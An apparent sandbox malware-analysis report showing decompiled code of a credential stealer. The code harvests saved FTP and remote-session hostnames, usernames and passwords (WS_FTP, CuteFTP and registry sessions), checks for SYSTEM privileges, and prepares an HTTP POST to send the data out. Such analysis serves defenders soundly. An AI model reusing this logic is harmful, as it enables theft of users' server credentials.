                                                                                                                                        0x10003e39
                                                                                                                                        0x10003e3e
                                                                                                                                        0x10003e40
                                                                                                                                        0x10003e48
                                                                                                                                        0x10003f0d
                                                                                                                                        0x10003f10
                                                                                                                                        0x10003f18
                                                                                                                                        0x10003f20
                                                                                                                                        0x10003f28
                                                                                                                                        0x10003f32
                                                                                                                                        0x10003f32
                                                                                                                                        0x10003e42
                                                                                                                                        0x10003e46
                                                                                                                                        0x10003e4d
                                                                                                                                        0x10003e50
                                                                                                                                        0x10003e51
                                                                                                                                        0x10003e54
                                                                                                                                        0x10003e56
                                                                                                                                        0x10003e5b
                                                                                                                                        0x10003e5d
                                                                                                                                        0x10003e93
                                                                                                                                        0x10003e5f
                                                                                                                                        0x10003e73
                                                                                                                                        0x10003e78
                                                                                                                                        0x10003ea5
                                                                                                                                        0x10003eaa
                                                                                                                                        0x10003eaa
                                                                                                                                        0x10003eac
                                                                                                                                        0x10003eb0
                                                                                                                                        0x10003eb6
                                                                                                                                        0x10003eca
                                                                                                                                        0x10003ecf
                                                                                                                                        0x10003ecf
                                                                                                                                        0x10003ed1
                                                                                                                                        0x10003ed5
                                                                                                                                        0x10003ed9
                                                                                                                                        0x10003eef
                                                                                                                                        0x10003ef1
                                                                                                                                        0x10003ef1
                                                                                                                                        0x10003ef3
                                                                                                                                        0x10003efe
                                                                                                                                        0x10003f03
                                                                                                                                        0x10003f03
                                                                                                                                        0x10003f05
                                                                                                                                        0x10003f05
                                                                                                                                        0x10003f08
                                                                                                                                        0x00000000
                                                                                                                                        0x10003f08
                                                                                                                                        0x10003ee4
                                                                                                                                        0x10003ee9
                                                                                                                                        0x10003ee9
                                                                                                                                        0x10003eeb
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10003eed
                                                                                                                                        0x00000000
                                                                                                                                        0x10003eae
                                                                                                                                        0x00000000
                                                                                                                                        0x10003eae
                                                                                                                                        0x10003eac
                                                                                                                                        0x00000000
                                                                                                                                        0x10003e46
                                                                                                                                        0x10003dfc

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 10003DC8
                                                                                                                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 10003DF3
                                                                                                                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 10003E39
                                                                                                                                        • ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 10003E56
                                                                                                                                        • wsprintfA.USER32 ref: 10003E73
                                                                                                                                        • wsprintfA.USER32 ref: 10003E93
                                                                                                                                          • Part of subcall function 10003D1A: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 10003D3F
                                                                                                                                        • lstrlenA.KERNEL32(?,00001000,00001000,00001000,00001000), ref: 10003EBE
                                                                                                                                        • closesocket.WSOCK32(?,?,00001000,00001000,00001000,00001000), ref: 10003F08
                                                                                                                                        Strings
                                                                                                                                        • <, xrefs: 10003E13
                                                                                                                                        • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 10003E6B, 10003E8B
                                                                                                                                        • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 10003E7D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
                                                                                                                                        • String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s
                                                                                                                                        • API String ID: 963220733-2459402781
                                                                                                                                        • Opcode ID: 8a5e1b2448810c0da192a85d48f6fd5ce5595176c10e5f0219c1d7b349ae476c
                                                                                                                                        • Instruction ID: 0888983b5b5e5894467bc943fb656bb7bf28cb1589a5faa9acdf3b18852950b7
                                                                                                                                        • Opcode Fuzzy Hash: 8a5e1b2448810c0da192a85d48f6fd5ce5595176c10e5f0219c1d7b349ae476c
                                                                                                                                        • Instruction Fuzzy Hash: 8951F575D04249EAEF12DFE0CC02BEEBBB9EF08380F508025F610B51A9DB75A915EB11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10002BDF, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                        			E10002BDF(signed int __eax, signed int __edx, intOrPtr _a1) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _t23;
				void* _t25;
				signed int _t28;
				signed int _t29;

				_push(_t25);
				_t28 = __edx ^ __eax;
				_t23 = __eax ^ _t28;
				_t29 = _t28 ^ _t23;
				_push(0x10002bf9);
				asm("clc");
				if(_t29 < 0) {
					_t1 = _t25 + 0xf4d43d;
					 *_t1 =  *((char*)(_t25 + 0xf4d43d)) + 1;
					asm("adc [eax], al");
					if( *_t1 == 0 ||  *0x1000f4dc == 0) {
						return 0;
					} else {
						_a1 = _a1 + _t29;
					}
				} else {
					return _t23;
				}
			}











                                                                                                                                        0x10002be5
                                                                                                                                        0x10002be6
                                                                                                                                        0x10002be8
                                                                                                                                        0x10002bea
                                                                                                                                        0x10002bec
                                                                                                                                        0x10002bf2
                                                                                                                                        0x10002bf4
                                                                                                                                        0x10002bf8
                                                                                                                                        0x10002bf8
                                                                                                                                        0x10002bfe
                                                                                                                                        0x10002c00
                                                                                                                                        0x10002c18
                                                                                                                                        0x10002c0b
                                                                                                                                        0x10002c11
                                                                                                                                        0x10002c11
                                                                                                                                        0x10002bf7
                                                                                                                                        0x10002bf7
                                                                                                                                        0x10002bf7

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: S-1-5-18
                                                                                                                                        • API String ID: 0-4289277601
                                                                                                                                        • Opcode ID: 9d1b4c49a9f063f5e7fb5eec7ee18641b8813ca66ba2f5df4ee82ff07f12576f
                                                                                                                                        • Instruction ID: 5af963882c6349db28aefbcf9fbaab6c6e5b630de29d917f351d6a793aefbab8
                                                                                                                                        • Opcode Fuzzy Hash: 9d1b4c49a9f063f5e7fb5eec7ee18641b8813ca66ba2f5df4ee82ff07f12576f
                                                                                                                                        • Instruction Fuzzy Hash: D5217C36A10209AFFF02CFA4CC86FAE7BB6EB013C4F108064F511E50A9DB719A54EB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 10002C19, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                        			E10002C19() {
				int _t23;
				int _t29;
				void* _t39;
				void* _t43;

				_t39 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t43 - 4) != 0) {
					 *(_t43 - 8) = 0;
					_t23 = GetTokenInformation( *(_t43 - 4), 1, 0, 0, _t43 - 8); // executed
					if(_t23 == 0 && GetLastError() == 0x7a &&  *(_t43 - 8) != 0) {
						 *(_t43 - 0xc) = E10001888( *(_t43 - 8));
						_t29 = GetTokenInformation( *(_t43 - 4), 1,  *(_t43 - 0xc),  *(_t43 - 8), _t43 - 8); // executed
						if(_t29 != 0) {
							_push(_t43 - 0x10);
							_push( *( *(_t43 - 0xc)));
							if( *0x1000f4e0() != 0) {
								if(lstrcmpA( *(_t43 - 0x10), "S-1-5-18") == 0) {
									_t39 = 1;
								}
								LocalFree( *(_t43 - 0x10));
							}
						}
						E10001871( *(_t43 - 0xc));
					}
					CloseHandle( *(_t43 - 4)); // executed
				}
				return _t39;
			}







                                                                                                                                        0x10002c19
                                                                                                                                        0x10002c2f
                                                                                                                                        0x10002c35
                                                                                                                                        0x10002c49
                                                                                                                                        0x10002c51
                                                                                                                                        0x10002c6b
                                                                                                                                        0x10002c7d
                                                                                                                                        0x10002c85
                                                                                                                                        0x10002c8f
                                                                                                                                        0x10002c90
                                                                                                                                        0x10002c99
                                                                                                                                        0x10002caa
                                                                                                                                        0x10002cac
                                                                                                                                        0x10002cac
                                                                                                                                        0x10002cb0
                                                                                                                                        0x10002cb0
                                                                                                                                        0x10002c99
                                                                                                                                        0x10002cb8
                                                                                                                                        0x10002cb8
                                                                                                                                        0x10002cc0
                                                                                                                                        0x10002cc0
                                                                                                                                        0x10002cc9

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(10002BF9), ref: 10002C1B
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 10002C27
                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 10002C49
                                                                                                                                        • GetLastError.KERNEL32 ref: 10002C53
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 10002C7D
                                                                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 10002C91
                                                                                                                                        • lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 10002CA3
                                                                                                                                        • LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 10002CB0
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002CC0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Token$InformationLocalProcess$AllocCloseConvertCurrentErrorFreeHandleLastOpenStringlstrcmp
                                                                                                                                        • String ID: S-1-5-18
                                                                                                                                        • API String ID: 1621329540-4289277601
                                                                                                                                        • Opcode ID: 95bd10a9bb94dc3ed1b792095bf81da213d1d10bc6da382d019e66ef6f7e6cfc
                                                                                                                                        • Instruction ID: 06d48ff545e4ab0d9f1e23b0812814883b401c2b402b61d5d6716e657f03d78c
                                                                                                                                        • Opcode Fuzzy Hash: 95bd10a9bb94dc3ed1b792095bf81da213d1d10bc6da382d019e66ef6f7e6cfc
                                                                                                                                        • Instruction Fuzzy Hash: 1611C536910609BBFF02DFA0CC86FADBBB5EB043C4F104464F611E51A9DB75AA54AB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 10005D33, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10005D33(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr* _v2096;
				char _v2100;
				long _t66;
				long _t67;
				intOrPtr* _t82;

				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t67 = _t66;
				if(_t67 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001DB1(E10001DB1(_a12, "\\"),  &_v2064);
						E10001871(_t72);
						_v2080 = E10001D2A(_a8, _v2068, "Password", 0);
						_v2072 = E10001D2A(_a8, _v2068, "HostName", 0);
						_v2076 = E10001D2A(_a8, _v2068, "UserName", 0);
						_v2088 = E10001D2A(_a8, _v2068, "RemoteDirectory", 0);
						_t82 = E10001D2A( *0x1000f159, _v2068, "PortNumber",  &_v2084);
						if(_t82 == 0 || _v2084 != 4) {
							_t83 = _t82;
							if(_t82 != 0) {
								E10001871(_t83);
							}
							_v2092 = 0x15;
						} else {
							 *_t28 =  *_t82;
							E10001871(_t82);
						}
						_v2096 = E10001D2A(_a8, _v2068, "FSProtocol",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E10001522(_a4, 0xbeef0010);
							E10001584(_a4, _v2072);
							E10001584(_a4, _v2076);
							E10001584(_a4, _v2080);
							E10001522(_a4, _v2092);
							E10001584(_a4, _v2088);
							if(_v2096 == 0 || _v2100 != 4) {
								E10001522(_a4, 0);
							} else {
								E10001522(_a4,  *_v2096);
							}
						}
						E10001871(_v2080);
						E10001871(_v2072);
						E10001871(_v2076);
						E10001871(_v2088);
						E10001871(_v2096);
						E10005D33(_a4, _a8, _v2068);
						E10001871(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t67;
			}



















                                                                                                                                        0x10005d46
                                                                                                                                        0x10005d4b
                                                                                                                                        0x10005d4d
                                                                                                                                        0x10005d53
                                                                                                                                        0x10005d5a
                                                                                                                                        0x10005d5a
                                                                                                                                        0x10005d81
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10005da5
                                                                                                                                        0x10005dab
                                                                                                                                        0x10005dc5
                                                                                                                                        0x10005de0
                                                                                                                                        0x10005dfb
                                                                                                                                        0x10005e16
                                                                                                                                        0x10005e39
                                                                                                                                        0x10005e3b
                                                                                                                                        0x10005e56
                                                                                                                                        0x10005e58
                                                                                                                                        0x10005e5b
                                                                                                                                        0x10005e5b
                                                                                                                                        0x10005e60
                                                                                                                                        0x10005e46
                                                                                                                                        0x10005e48
                                                                                                                                        0x10005e4f
                                                                                                                                        0x10005e4f
                                                                                                                                        0x10005e84
                                                                                                                                        0x10005e91
                                                                                                                                        0x10005eb9
                                                                                                                                        0x10005ec7
                                                                                                                                        0x10005ed5
                                                                                                                                        0x10005ee3
                                                                                                                                        0x10005ef1
                                                                                                                                        0x10005eff
                                                                                                                                        0x10005f0b
                                                                                                                                        0x10005f2d
                                                                                                                                        0x10005f16
                                                                                                                                        0x10005f21
                                                                                                                                        0x10005f21
                                                                                                                                        0x10005f0b
                                                                                                                                        0x10005f38
                                                                                                                                        0x10005f43
                                                                                                                                        0x10005f4e
                                                                                                                                        0x10005f59
                                                                                                                                        0x10005f64
                                                                                                                                        0x10005f75
                                                                                                                                        0x10005f80
                                                                                                                                        0x10005f85
                                                                                                                                        0x10005f85
                                                                                                                                        0x00000000
                                                                                                                                        0x10005f90
                                                                                                                                        0x10005f96

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10005D46
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 10005D7A
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 10005F90
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                                                                                                                        • API String ID: 1332880857-3874328862
                                                                                                                                        • Opcode ID: 38e6ca8cc67d9726efcc16e3e746ac6671f0c446e170c64718ebf116790635fc
                                                                                                                                        • Instruction ID: 14a426d04eaed78736a0683ddc6382c050ee472c636530915fb382d8686ac389
                                                                                                                                        • Opcode Fuzzy Hash: 38e6ca8cc67d9726efcc16e3e746ac6671f0c446e170c64718ebf116790635fc
                                                                                                                                        • Instruction Fuzzy Hash: C051B53980011DEAEF229F60CC06BED7AB9FF04381F10C1A5F55965069DF76AB91AF81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 12.89%

                                                                                                                                        Function 100026B6, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84registryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100026B6(char* _a4, char* _a8, int _a12) {
				void* _v8;
				void* _v12;
				char _v273;
				CHAR* _v280;
				long _t24;
				long _t29;
				CHAR* _t36;
				void* _t37;
				long _t45;
				void* _t48;
				void* _t49;

				_t48 = 0;
				_t24 = RegCreateKeyA( *0x1000f159, "Software\\WinRAR",  &_v8); // executed
				if(_t24 == 0) {
					_t45 = RegSetValueExA(_v8, _a4, 0, 3, _a8, _a12); // executed
					if(_t45 == 0) {
						_t48 = 1;
					}
					RegCloseKey(_v8); // executed
				}
				_t49 = _t48;
				if(_t49 == 0) {
					_t29 = GetTempPathA(0x104,  &_v273);
					if(_t29 != 0 && _t29 <= 0x104) {
						CreateDirectoryA( &_v273, 0);
						if(E10002582( &_v273) != 0) {
							_t36 = E10001DB1( &_v273, _a4);
						} else {
							_t36 = E10001E05(E10001DB1( &_v273, "\\"), _a4);
						}
						_v280 = _t36;
						_t37 = CreateFileA(_v280, 0xc0000000, 3, 0, 2, 0, 0);
						_v12 = _t37;
						if(_t37 + 1 != 0) {
							_t49 = E1000145E(_v12, _a8, _a12);
							CloseHandle(_v12);
						}
						_t49 = _t49;
						if(_t49 == 0) {
							DeleteFileA(_v280);
						}
						E10001871(_v280);
					}
				}
				return _t49;
			}














                                                                                                                                        0x100026c0
                                                                                                                                        0x100026d1
                                                                                                                                        0x100026d8
                                                                                                                                        0x100026ea
                                                                                                                                        0x100026f1
                                                                                                                                        0x100026f3
                                                                                                                                        0x100026f3
                                                                                                                                        0x100026f7
                                                                                                                                        0x100026f7
                                                                                                                                        0x100026fc
                                                                                                                                        0x100026fe
                                                                                                                                        0x10002715
                                                                                                                                        0x10002717
                                                                                                                                        0x10002731
                                                                                                                                        0x10002744
                                                                                                                                        0x1000276c
                                                                                                                                        0x10002746
                                                                                                                                        0x1000275b
                                                                                                                                        0x1000275b
                                                                                                                                        0x10002771
                                                                                                                                        0x1000278c
                                                                                                                                        0x10002791
                                                                                                                                        0x10002795
                                                                                                                                        0x100027a5
                                                                                                                                        0x100027aa
                                                                                                                                        0x100027aa
                                                                                                                                        0x100027af
                                                                                                                                        0x100027b1
                                                                                                                                        0x100027b9
                                                                                                                                        0x100027b9
                                                                                                                                        0x100027c4
                                                                                                                                        0x100027c4
                                                                                                                                        0x10002717
                                                                                                                                        0x100027cd

                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 100026D1
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 100026EA
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 100026F7
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 10002710
                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 10002731
                                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 1000278C
                                                                                                                                        • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 100027AA
                                                                                                                                        • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 100027B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
                                                                                                                                        • String ID: Software\WinRAR
                                                                                                                                        • API String ID: 3443402316-224198155
                                                                                                                                        • Opcode ID: 4aa9dc4f55051fd92b720c6859483afba20bf0249ab5a0e3e98016433aadca9a
                                                                                                                                        • Instruction ID: f2ecb7b8569c9a255435a7bde00bff913bdbeb92c25537041e106fd312444528
                                                                                                                                        • Opcode Fuzzy Hash: 4aa9dc4f55051fd92b720c6859483afba20bf0249ab5a0e3e98016433aadca9a
                                                                                                                                        • Instruction Fuzzy Hash: D4214C79A0060DBAFF11DFA0DC82FDD7A79EB147C0F1004A5B718A50AADAB1AB509B11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        Function 10004C5C, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10004C5C(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				CHAR* _v276;
				int _t24;
				void* _t25;
				void* _t26;
				long _t37;
				long _t40;
				void* _t47;
				void* _t48;
				void* _t49;

				_t49 = __edx;
				_t48 = __ecx;
				_t47 = __ebx;
				_v8 = E100015A9(_a4, 3, 0);
				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t24 != 0 && _t24 <= 0x104) {
					_v276 = E10001DB1( &_v269, "\\win.ini");
					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x1000f137,  &_v269, 0x104, _v276); // executed
					if(_t37 != 0) {
						E10004A84(_t48, _a4,  &_v269, 0);
					}
					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x1000f137,  &_v269, 0x104, _v276); // executed
					_t53 = _t40;
					if(_t40 != 0) {
						E10004A84(_t48, _a4,  &_v269, 0);
					}
					E10001871(_v276);
				}
				_t25 = E10001E6A(_t53, 0x2b); // executed
				_t26 = _t25;
				_t54 = _t26;
				if(_t26 != 0) {
					E10004A84(_t48, _a4, E10001E05(_t26, "\\Ipswitch\\WS_FTP"), 0); // executed
					E10001871(_t31);
				}
				E10004C10(_t48, _t54, _a4, 0x1a, "\\Ipswitch"); // executed
				E10004C10(_t48, _t54, _a4, 0x23, "\\Ipswitch"); // executed
				E10004C10(_t48, _t54, _a4, 0x1c, "\\Ipswitch"); // executed
				return E100015EF(_t47, _t48, _t49, _t54, _a4, _v8);
			}














                                                                                                                                        0x10004c5c
                                                                                                                                        0x10004c5c
                                                                                                                                        0x10004c5c
                                                                                                                                        0x10004c71
                                                                                                                                        0x10004c85
                                                                                                                                        0x10004c87
                                                                                                                                        0x10004ca9
                                                                                                                                        0x10004cd0
                                                                                                                                        0x10004cd7
                                                                                                                                        0x10004ce5
                                                                                                                                        0x10004ce5
                                                                                                                                        0x10004d0b
                                                                                                                                        0x10004d10
                                                                                                                                        0x10004d12
                                                                                                                                        0x10004d20
                                                                                                                                        0x10004d20
                                                                                                                                        0x10004d2b
                                                                                                                                        0x10004d2b
                                                                                                                                        0x10004d32
                                                                                                                                        0x10004d37
                                                                                                                                        0x10004d37
                                                                                                                                        0x10004d39
                                                                                                                                        0x10004d4d
                                                                                                                                        0x10004d52
                                                                                                                                        0x10004d52
                                                                                                                                        0x10004d61
                                                                                                                                        0x10004d70
                                                                                                                                        0x10004d7f
                                                                                                                                        0x10004d90

                                                                                                                                        APIs
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 10004C80
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,1000F137,?,00000104,?), ref: 10004CD0
                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,1000F137,?,00000104,?), ref: 10004D0B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                                                                                                        • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                                                                                                        • API String ID: 2508676433-45949541
                                                                                                                                        • Opcode ID: eb97cd1f0e2c986a26f8acf9b2e6d8739f3ccb22311936a2a995d4dd87c5fb63
                                                                                                                                        • Instruction ID: 9fc757f722d9e5c4d1f63979fcce86b5e771d899d87070f8cfc3463daa125b20
                                                                                                                                        • Opcode Fuzzy Hash: eb97cd1f0e2c986a26f8acf9b2e6d8739f3ccb22311936a2a995d4dd87c5fb63
                                                                                                                                        • Instruction Fuzzy Hash: 492153B9A40109BEFF11EB60CC43FED7668EB143C0F010065B748F44AAEFB1AB909A55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 10004FD4, Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                        			E10004FD4(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t30;
				void* _t37;
				void* _t38;
				void* _t39;
				char* _t40;

				_t39 = __edx;
				_t38 = __ecx;
				_t37 = __ebx;
				_v8 = E100015A9(_a4, 4, 0);
				_t40 =  *0x1000f0dd; // 0x2874ff8
				if( *_t40 == 0) {
					L5:
					E10004F2B(_t38, _t44, _a4, 0x1a); // executed
					E10004F2B(_t38, _t44, _a4, 0x23); // executed
					E10004F2B(_t38, _t44, _a4, 0x1c); // executed
					E10004F2B(_t38, _t44, _a4, 0x26); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"); // executed
					return E100015EF(_t37, _t38, _t39, _t44, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t30 = StrStrIA(_t40, "CUTEFTP");
					_t42 = _t30;
					if(_t30 != 0) {
						_t34 = E100023E6(_t42, _t40);
						if(E100023E6(_t42, _t40) != 0) {
							E10004DF4(_t38, _a4, _t34, "\\sm.dat");
							E10001871(_t34);
						}
					}
					asm("cld");
					_t38 = 0xffffffff;
					asm("repne scasb");
					_t44 =  *_t40;
				} while ( *_t40 != 0);
				goto L5;
			}









                                                                                                                                        0x10004fd4
                                                                                                                                        0x10004fd4
                                                                                                                                        0x10004fd4
                                                                                                                                        0x10004fe7
                                                                                                                                        0x10004fea
                                                                                                                                        0x10004ff3
                                                                                                                                        0x10005030
                                                                                                                                        0x10005035
                                                                                                                                        0x1000503f
                                                                                                                                        0x10005049
                                                                                                                                        0x10005053
                                                                                                                                        0x10005060
                                                                                                                                        0x1000506d
                                                                                                                                        0x1000507a
                                                                                                                                        0x10005087
                                                                                                                                        0x10005094
                                                                                                                                        0x100050a1
                                                                                                                                        0x100050ae
                                                                                                                                        0x100050c0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10004ff5
                                                                                                                                        0x10004ff5
